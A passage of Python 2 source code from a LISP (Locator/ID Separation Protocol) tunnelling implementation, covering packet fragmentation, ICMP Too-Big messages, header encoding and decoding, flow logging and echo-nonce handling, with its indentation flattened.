def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
